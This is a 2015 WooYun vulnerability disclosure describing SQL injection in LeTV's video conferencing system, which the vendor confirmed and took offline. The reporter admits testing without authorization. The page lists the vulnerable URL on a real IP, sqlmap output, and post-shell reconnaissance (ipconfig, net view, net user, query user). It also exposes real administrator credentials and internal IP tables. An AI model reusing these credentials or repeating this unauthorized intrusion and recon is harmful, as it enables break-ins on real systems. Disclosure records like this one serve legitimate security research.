当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099777

漏洞标题:乐视网视频会议系统存在注入可shell可内网

相关厂商:乐视网

漏洞作者: Mr,prince

提交时间:2015-03-06 09:25

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

乐视网视频会议系统存在SQL盲注,攻击者可以利用SQL注入达到直接write shell的目的。
貌似这个会议系统是刚上线把?
从目前的环境看,这儿应该是可以进入内网的,只要获取内部的网段即可。
另外我没有做任何其他的行为,webshell我会自己删除,如果给管理造成的不便,还请谅解,没有经过你的授权就进程了渗透测试,还请多多包含,我也只是希望能够帮助你们改善一些问题。

详细说明:

SQL注入地址:
http://115.182.51.182:8090//web/dept.php
[03:56:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 4.1
c:\> ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : WIN-SKTH4MFTLEV
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
物理地址. . . . . . . . . . . . . : 00-50-56-89-1A-20
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::6df0:6624:a50a:ebed%11(首选)
IPv4 地址 . . . . . . . . . . . . : 115.182.51.182(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 115.182.51.1
DHCPv6 IAID . . . . . . . . . . . : 234901590
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-17-01-F0-95-00-50-56-89-1A-20
DNS 服务器 . . . . . . . . . . . : 219.141.136.10
219.141.140.10
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{E8BF1C9C-D390-4948-95D5-745DC82A29AB}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:244c:28e2:8c49:cc49(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::244c:28e2:8c49:cc49%13(首选)
默认网关. . . . . . . . . . . . . :
TCPIP 上的 NetBIOS . . . . . . . : 已禁用
隧道适配器 6TO4 Adapter:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
IPv6 地址 . . . . . . . . . . . . : 2002:73b6:33b6::73b6:33b6(首选)
默认网关. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
DNS 服务器 . . . . . . . . . . . : 219.141.136.10
219.141.140.10
TCPIP 上的 NetBIOS . . . . . . . : 已禁用


c:\> net view
服务器名称 注解
-------------------------------------------------------------------------------
\\LETV letv server (Samba, Ubuntu)
\\SVCTAG-BSDNK2X
\\WIN-496RU2U6F1F
\\WIN-SKTH4MFTLEV
命令成功完成。
c:\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator

mask 区域
*****nx*****

ian duhaibin
Guest liguotao
命令运行完毕,但发生一个或多个错误。
c:\> query user
用户名 会话名 ID 状态 空闲时间 登录时间
c

mask 区域
*****xu*****

ian 2 断开 27+15:38 2015/1/6 14:20
l

mask 区域
*****ot*****

o 3 断开 1+08:57 2015/1/23 15:58
administrator 4 断开 6+17:04 2015/1/7 17:28
WIN-SKTH4MFTLEV\c

mask 区域
*****eji*****

:letv123!@#
WIN-SKTH4MFTLEV\

mask 区域
*****uo*****

:letv123!@#
WIN-SKTH4MFTLEV\Administrator:letv123!@#
ItGzjI7fAqMgrk2
219.153.14.131
10.1.14.131
ItGzjI7fAqMgrk2
220.178.229.12
10.1.229.12
IP1 低 管理卡 临时管理卡
113.6.235.10 10.1.235.10 113.6.235.110
113.6.235.11 10.1.235.11 113.6.235.111
113.6.235.12 10.1.235.12 113.6.235.112
113.6.235.13 10.1.235.13 113.6.235.113
113.6.235.14 10.1.235.14 113.6.235.114
113.6.235.15 10.1.235.15 113.6.235.115
113.6.235.16 10.1.235.16 113.6.235.116
113.6.235.17 10.1.235.17 113.6.235.117
113.6.235.18 10.1.235.18 113.6.235.118
113.6.235.19 10.1.235.19 113.6.235.119
113.6.235.20 10.1.235.20 113.6.235.120
113.6.235.21 10.1.235.21 113.6.235.121
113.6.235.22 10.1.235.22 113.6.235.122
113.6.235.23 10.1.235.23 113.6.235.123
113.6.235.24 10.1.235.24 113.6.235.124
vi /etc/sysconfig/network-scripts/ifcfg-eth0
service network restart
calvin
TVLE800G
掩码:255.255.255.128
网关:113.6.235.1
CDN-HLJ-HEB-CNC-

漏洞证明:

1.png


2.png

修复方案:

修复SQL注入即可,看了看代码。貌似这套会议系统问题还有。

版权声明:转载请注明来源 Mr,prince@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-03-06 10:05

厂商回复:

感谢支持!测试系统目前已做下线处理!

最新状态:

暂无